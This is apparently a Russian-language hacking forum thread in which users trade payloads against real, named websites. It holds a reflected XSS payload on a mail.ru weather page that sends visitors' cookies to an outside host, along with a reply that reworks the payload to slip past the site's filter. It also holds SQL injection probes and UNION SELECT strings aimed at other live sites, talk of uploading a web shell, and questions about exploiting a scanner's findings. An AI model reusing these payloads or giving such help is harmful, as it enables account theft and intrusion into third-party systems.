http://pogoda.mail.ru/?city=1301"><script>alert(document.cookie)</script>&extended=1 Простите, если боян)))) Работает и в Опере и в ИЕ))) Но через сниффер не хочет передовать данные(( Почему? Запрос подаю так: http://pogoda.mail.ru/?city=1301"><script>img = new Image(); img.src = "http://s.netsec.ru/plum.gif?"+document.cookie;</script>&extended=1 http://s.netsec.ru/plum.gif - Ссылка проверяна... просто так работает... А предовать дынные через mail не хочет((
Нашел на сайте уязвимости: xss vulnerability : /lol/comment.php?entry=http://www.google.fr/webhp%3f<balisexss>%22%27 bad http code 404 /lol/?page=http://www.google.fr/webhp%3f<balisexss>%22%27&Submit=default Что посоветуете? ПОМОГИТЕ пожалуйста!!!
>> Что посоветуете? Посоветую тебе не заёбывать людей логами с какого то сканера, а идти и почитать нормальные мануалы.
http://pogoda.mail.ru/?city=1301"><script>alert(document.cookie)</script>&extended=1 Простите, если боян)))) Работает и в Опере и в ИЕ))) Но через сниффер не хочет передовать данные(( Почему? Запрос подаю так: http://pogoda.mail.ru/?city=1301"><script>img = new Image(); img.src = "http://s.netsec.ru/plum.gif?"+document.cookie;</script>&extended=1 http://s.netsec.ru/plum.gif - Ссылка проверяна... просто так работает... А предовать дынные через mail не хочет((
2Tigger вот твоя проблема скажи честно ты в код страницы хоть заглядывал ? Code: a href="/?city=1301"><script>img = new Image(fuck)"><img src="/img/prjlogo_weather.gif" width=80 фильтр как видно отсюда проглатывает все что после ";" и закрывает тег а алет у тебя работал по тому что там ";" нету попробуй так Code: http://pogoda.mail.ru/?city=1301"><script>img = new Image()%3B img.src = "http://s.netsec.ru/plum.gif?"+document.cookie%3B </script>&extended=1
Помогите с проблемкой ! Вот есть сатик нашел SQL inj, но не могу подобрать таблицу может кто поможет _http://www.restec.ru/exhibitions/featured/motoshow/getstand.ru.html?exhibs=-811+union+select+1/* + еще если не ошибаюсь есть PHP Inj, как это можно использовать ? http://www.restec.ru/exhibitions/featured/motoshow/img/page.ru.html?http://www.sciam.com/media/inline/B3421824-EB0D-566A-0A231B2465213E50_1.jpg Поправьте если где не прав ? Заранее спасибо!
2 Snap А насчёт таблиц-ручками ,вот ссылка на дефолтные может пригодится?: _http://forum.antichat.ru/showpost.php?p=465677&postcount=3 Удачи
Code: http://www.xxx.xxx/includes/xxxx.asp?pg=1' орет Unclosed quotation mark before the character string '1'' скуль ?
собственно в чем закючаеться вопрос то Code: 1'+OR+1=@@VERSION()-- орет ncorrect syntax near the keyword 'OR' почему ? или енто кокраз оставшиеся 10%
Эта ошибка может возникнуть по 2 причинам : 1 инъекция-90% 2 кривые руки программера-10% Т.к. вопрос изначально стоял так:"скуль?", я и дал 90% Ну и разумеется если 1+or+1=@@version-- без скобок ,со скобкой,с одинарной кавычкой,с двойной кавычкой,без кавычки проходит то скуль :d А вообще была-бы ссылка было-бы проще :d
http://video.antichat.ru/file98.html - в каких версиях работает? в каких форумах не пробую нигде не получается
да конечно вот ссылка Code: http://www.nbc40.net/includes/pgstat.asp?pg=1' и сдесь Code: http://www.nbc40.net/pages/newspix/newspix.asp?ID=10' возможность залития шелла в папку аплоадс через вот сдесь Code: http://www.nbc40.net/pages/upload.php ну и вообше на сервере дотупны к просмотрю все папки +раскрытие путей но хотело бы добить скуль не с ковычками не без не со скобками не без не идет
Просканил сайтик Acunetix.Web.Vulnerability.Scanner сканером. Выдало Blind SQL/XPath injection. View HTTP headers Request POST /index.php?page=uvod HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.site.ru Content-Length: 134 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected]&[email protected]'+%7C%7C+'ACUtwoACU&[email protected]&b1=Ok Как заюзать в этом случае инъекцию? Как использовать пост запрос на практике? Помогите новичку. Подробней если можна
ну про пост запросы если пользуешься лисой качаешьшь аддон на нее "tamper data" включаешь и редактируешь заголовки и post!
я прошу объяснить как это всё дело работает и как его применить на практике. Тоесть что и куда инжектится? Что подставить в запрос, чтоб добыть инфу. Примеры если можна. p.s Типа http://site.ru/ITC/news.php?id=-773+union+select+1,version(),3,4,5/*
постучись в аську обьясню что бы тему не засорять ! аська в профиле ! 2Piflit ну енто кума как Я к temper привык
